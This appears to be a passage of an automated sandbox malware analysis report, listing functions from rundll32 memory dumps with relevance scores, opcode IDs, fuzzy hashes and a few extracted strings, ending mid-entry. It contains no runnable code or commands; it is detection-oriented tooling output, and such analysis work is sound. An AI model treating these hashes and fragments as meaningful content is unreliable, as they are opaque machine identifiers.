                                                                                                                                                                                                                                          Function 050446B0 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3f6abe9deac239970131489dae92f26c104966838eacade25c07899e6a4d9ed6
                                                                                                                                                                                                                                          • Instruction ID: 7fea21f90ca5ab95215bcc4a2bd5b26e22ac46f28787e3436b27b61f052af546
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f6abe9deac239970131489dae92f26c104966838eacade25c07899e6a4d9ed6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17B092B0A0530CAF8620DA9A980185ABBACDB0A210B4001D9E9088B320D973AA1066D2
                                                                                                                                                                                                                                          Function 05040440 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a4b45e05625937b030280bde69c057f0c085c912c254484aeea06c59059578d5
                                                                                                                                                                                                                                          • Instruction ID: 7a249ec980575028c59348ac77d6e3b728d8bf5d41a47e009ea73cd053bc9b8e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4b45e05625937b030280bde69c057f0c085c912c254484aeea06c59059578d5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7C048734A4104AFCB01CBD0E986B967BA5FB64316F985664E100C1215E33E8852DA11

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 0504F7E8 Relevance: 7.7, Strings: 6, Instructions: 151COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq$,hq$,hq$Hhq$`]iq$`]iq
                                                                                                                                                                                                                                          • API String ID: 0-4082953167
                                                                                                                                                                                                                                          • Opcode ID: fa488f7256a20f6a4977ee9d964fc12ef1105cb05cd4c9062a62efa01d0259b4
                                                                                                                                                                                                                                          • Instruction ID: 42feb8f28fad5cf703c6cae8437a154ac3472fff57e5be9391ad909aba485cef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa488f7256a20f6a4977ee9d964fc12ef1105cb05cd4c9062a62efa01d0259b4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88412875B141298FDB54AB3CA81446E37D6FFCA66132404AFD506DF3A0DE24EC828BD9

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 04FE50B8 Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: \VZm
                                                                                                                                                                                                                                          • API String ID: 0-3153696063
                                                                                                                                                                                                                                          • Opcode ID: 8cbba9157b9ab864a7af7906aaaba88253fd0cf52bd3dfc0a1aa7f26fdbbbd5d
                                                                                                                                                                                                                                          • Instruction ID: 867d9d50954ecbd46bb29c7354ab3142f7616fdc484ee968f1693c35d308561c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8cbba9157b9ab864a7af7906aaaba88253fd0cf52bd3dfc0a1aa7f26fdbbbd5d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9B16F70E00219DFDB14CFEAC8817EDBBF2AF88309F149529D815A7294EB75A846CB41
                                                                                                                                                                                                                                          Function 04FE59A8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 26f98b373addae48a31c65f4645a4299783172c27c6d42f02e9ce8dce385b1a1
                                                                                                                                                                                                                                          • Instruction ID: 17e8bf01b0ff43359b30958add722ce586a01175929e2b112f238481309521d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26f98b373addae48a31c65f4645a4299783172c27c6d42f02e9ce8dce385b1a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5B1A370E00209DFDB10CFEAD8917ADBBF2BF88719F149529D415E7294EB74A842CB81
                                                                                                                                                                                                                                          Function 04FE1630 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $dq$$dq
                                                                                                                                                                                                                                          • API String ID: 0-2340669324
                                                                                                                                                                                                                                          • Opcode ID: 488c365d18691f3987f81fdb8f55d1293d191adb33a17608620b927b9c8ac9fa
                                                                                                                                                                                                                                          • Instruction ID: 652eca8a392217b30cdef8e650100c309b77d22a788be7ddc95c8e84497ecfd8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 488c365d18691f3987f81fdb8f55d1293d191adb33a17608620b927b9c8ac9fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A51D075B012099FCB14DF7AD8406AEBBF6EFC9351B14812AD909DB350DA30AD42C7A1
                                                                                                                                                                                                                                          Function 04FE50B6 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: \VZm
                                                                                                                                                                                                                                          • API String ID: 0-3153696063
                                                                                                                                                                                                                                          • Opcode ID: cab3f793b10ce6198a7d7a83ef75af08c5172e1f53ea6301cbfc83de6effa295
                                                                                                                                                                                                                                          • Instruction ID: 65275659dbb1c5f42085a365558936ced2f62c8fdd6c36eca85cf5baacef218a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cab3f793b10ce6198a7d7a83ef75af08c5172e1f53ea6301cbfc83de6effa295
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00B17D70E00219EFDB10CFEAD8817EDBBF2BF48309F149129D815A7294EB75A846CB41
                                                                                                                                                                                                                                          Function 04FE1080 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq
                                                                                                                                                                                                                                          • API String ID: 0-4060669308
                                                                                                                                                                                                                                          • Opcode ID: 214e12922860374a377951160778eada4d91cf3fff22b209870133ddd6dc509d
                                                                                                                                                                                                                                          • Instruction ID: 190cc989fc43ef63da658df41333cc8077cbbfb160ea02ac0bc7107b3d45db43
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 214e12922860374a377951160778eada4d91cf3fff22b209870133ddd6dc509d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6371AF35B002189FEB14ABBAC95477EB6A7EFC8311F158029E506AB3A0DF75ED438741
                                                                                                                                                                                                                                          Function 04FE0C1C Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq
                                                                                                                                                                                                                                          • API String ID: 0-4060669308
                                                                                                                                                                                                                                          • Opcode ID: d82989f8c730c715457031eb230cae839104a5fb2ae3422ccaf447fcaa56194b
                                                                                                                                                                                                                                          • Instruction ID: 045998ba07d34c453612e4a1b885955c8942eb721b403f1ab8341e37d226ae94
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d82989f8c730c715457031eb230cae839104a5fb2ae3422ccaf447fcaa56194b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0512635B002199FE7049BAAD8647BE7BB2EFC9311F15802AD406E7391CE79AD07C791
                                                                                                                                                                                                                                          Function 04FE599C Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6048f0fe58917e0b6264ef9c292ec26e9657c163c49b279b377fd9aaaa21ddcc
                                                                                                                                                                                                                                          • Instruction ID: b2b271efa3f255cd0bd6374ee2a2de6ca5e86ea8f943b0e265861f8d91f2681e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6048f0fe58917e0b6264ef9c292ec26e9657c163c49b279b377fd9aaaa21ddcc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFB16D70E00219DFDB10CFEAD8817ADBBF1BF48719F149529D815EB294EB74A846CB81
                                                                                                                                                                                                                                          Function 04FE1A48 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0c95a3050d9d5d90c5e57b7c9be9281125545192bcd0695d978b8d608990c58d
                                                                                                                                                                                                                                          • Instruction ID: d8a077cc1393b5b84d5fbe7c243b6a5390aa4f40b535f9b652ff8cf355d3a226
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c95a3050d9d5d90c5e57b7c9be9281125545192bcd0695d978b8d608990c58d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5315B37B051592FC3155AF7B92A5BB7B57CBC2702B069036D6048F2A5ED386C0783E1
                                                                                                                                                                                                                                          Function 04FE1D58 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9ad3f7b280a0057cbdcb0693bf5042c0e9b16766c247a6961aa4c623f2ceaeb2
                                                                                                                                                                                                                                          • Instruction ID: 8eec6244e7b60ca227e4c42b923cebdc4c95a1842a308944d881c172d32fa554
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ad3f7b280a0057cbdcb0693bf5042c0e9b16766c247a6961aa4c623f2ceaeb2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E412731A0520DAFD714DFA6E860BBA7FB6DF89315F104069E80997390CE35AD47C790
                                                                                                                                                                                                                                          Function 04FE2268 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 72ba7cf1a17e9e7201ad4ed9f0a74d8d2db50ab16a0e9c1f8d548bbc15fd52a6
                                                                                                                                                                                                                                          • Instruction ID: ed5198a8a242bc0861b9ea559459ae2664c4465e002fd5614c9f191b52894c7d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72ba7cf1a17e9e7201ad4ed9f0a74d8d2db50ab16a0e9c1f8d548bbc15fd52a6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB411C35B002149FCB54DF69D8809AEB7B6FF8C715B11816AE905EB364EB31ED42CB90
                                                                                                                                                                                                                                          Function 04FE1071 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1e69b0fe51be17b41c9811b5cea6c1aefcbfb1cc54404ce617ae4658c01466de
                                                                                                                                                                                                                                          • Instruction ID: b6ffceb4e362964f7f79baeb50845e36e74a832e2b23c297011d6a6bfc560efe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e69b0fe51be17b41c9811b5cea6c1aefcbfb1cc54404ce617ae4658c01466de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A711E472F002149BEB148A6799506FEB7EEDBC8252F048037D906D7345EA74EE038391
                                                                                                                                                                                                                                          Function 04FE2258 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 07ef3efc2d728449b8a293175cd5d79d3d3bd1e05f26f600ef3d4a2b1c478d5e
                                                                                                                                                                                                                                          • Instruction ID: 7130490eb6a2def2eff13caf5a98b25091363c5dfb162fd4532df38fd5b1aed8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07ef3efc2d728449b8a293175cd5d79d3d3bd1e05f26f600ef3d4a2b1c478d5e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0212E75E102189FCB54DF69D8809DEBBB5EF8C714F10816AE905AB324EB319942CB90
                                                                                                                                                                                                                                          Function 04FE0F20 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 77107e8acc4f9d56113257d760e72defe64e5fa293a5125d380caeb5246ad58f
                                                                                                                                                                                                                                          • Instruction ID: ead3f9b5de6eaec0e1512c2fe7084e9c7869db5d1412d1a38c01f2c8c039e295
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77107e8acc4f9d56113257d760e72defe64e5fa293a5125d380caeb5246ad58f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50016626F093A41BD725167B296427E7F9A8BC5622F058466D908CB301EE789C0382E1
                                                                                                                                                                                                                                          Function 04FE2B18 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f35775c58c0a181339f399b7e8c7fbdd4912a4ee75a0ceffa342fdbfb77f02c1
                                                                                                                                                                                                                                          • Instruction ID: a7819b459a3d0164e1ccd2793404a813b2dc836970c0ee77764f4a77baf23bf8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f35775c58c0a181339f399b7e8c7fbdd4912a4ee75a0ceffa342fdbfb77f02c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28119175B002284B8B54EB7D94201BE7AE69FC86567150469C50AD7344EF349E038BD2
                                                                                                                                                                                                                                          Function 04FE1958 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 64c1f27c016833a9dcc1c010ad1eaf340cac7c601f97b9d78c2481dc429d10ab
                                                                                                                                                                                                                                          • Instruction ID: 1b846e6223d63d40103a626ac3178f1c481495854ccc19cb658cb78d4ea7126c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64c1f27c016833a9dcc1c010ad1eaf340cac7c601f97b9d78c2481dc429d10ab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91119336600219AFD704DFA5E858AEA7BB2EFCC311F115029D809A7350CF75AD46DB90
                                                                                                                                                                                                                                          Function 04FE1378 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1c0b83106f09fed44cf47291042d61da4bc2f4514b87a79c02a034be39adad09
                                                                                                                                                                                                                                          • Instruction ID: b242e7fb84445184c188def648435966b19671354a7fb2446c973ea011ea2726
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c0b83106f09fed44cf47291042d61da4bc2f4514b87a79c02a034be39adad09
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E42138B1D002098FDB14DFAAC485AEEFBF0FF88324F10812AD55967240C7796906CFA1
                                                                                                                                                                                                                                          Function 04FE2B08 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8a8e9b5bdf8822ef3a17eda0dad630b086ee6c6bd67a0f64c2f3568b79e26528
                                                                                                                                                                                                                                          • Instruction ID: 6f848b577093ad93c49f7153d2779ee7d5c6c5d097e376f072ce34819e7dca35
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a8e9b5bdf8822ef3a17eda0dad630b086ee6c6bd67a0f64c2f3568b79e26528
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A801F575B002248FC744EB7994202BE7BE6DFC82027064579C409D7380EF3499438BE2
                                                                                                                                                                                                                                          Function 04FE1E20 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3c69fe4b78373947bb6bd18c77487866c42aa1255eaa043fd84e185b9ba60719
                                                                                                                                                                                                                                          • Instruction ID: 5117ef194b95cf162e1f48aa235fb68800453736e09e37d93463eab98c5ff664
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c69fe4b78373947bb6bd18c77487866c42aa1255eaa043fd84e185b9ba60719
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6116035A00209AFD704DFE6E854ABA7BB7EFCC315F154019D409A7390CE796D86DB90
                                                                                                                                                                                                                                          Function 04FE1380 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0865dd2f4c1cb7018fb37639f820c165d72784a02da40038045d2c0292f54298
                                                                                                                                                                                                                                          • Instruction ID: 239867076fe1783ce44995c3bcf368c1c0dc1d1e319c9bc25e857c9898fadf26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0865dd2f4c1cb7018fb37639f820c165d72784a02da40038045d2c0292f54298
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 471106B1D002098FDB14DFAAC485AEEFBF4FF88324F50842AD55967240C7756905CFA5
                                                                                                                                                                                                                                          Function 04FE1440 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 740b8fab8fba34c3838c8bb15025a0ceb6888ee086b4625ce4fe21de0d26ac97
                                                                                                                                                                                                                                          • Instruction ID: e02d9e90bdf86bfca4c045cebb610d9347d19e64c07178306bde40ecff8fe2e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 740b8fab8fba34c3838c8bb15025a0ceb6888ee086b4625ce4fe21de0d26ac97
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C101D871B0930A1FD7095FF669751373FA9DFC211230619AED909CB262F924990683D1
                                                                                                                                                                                                                                          Function 04FE1968 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4b2f88848dc4c56fb5bb5cfa614daf58857eacd2a2950c05dba70f81add56f4d
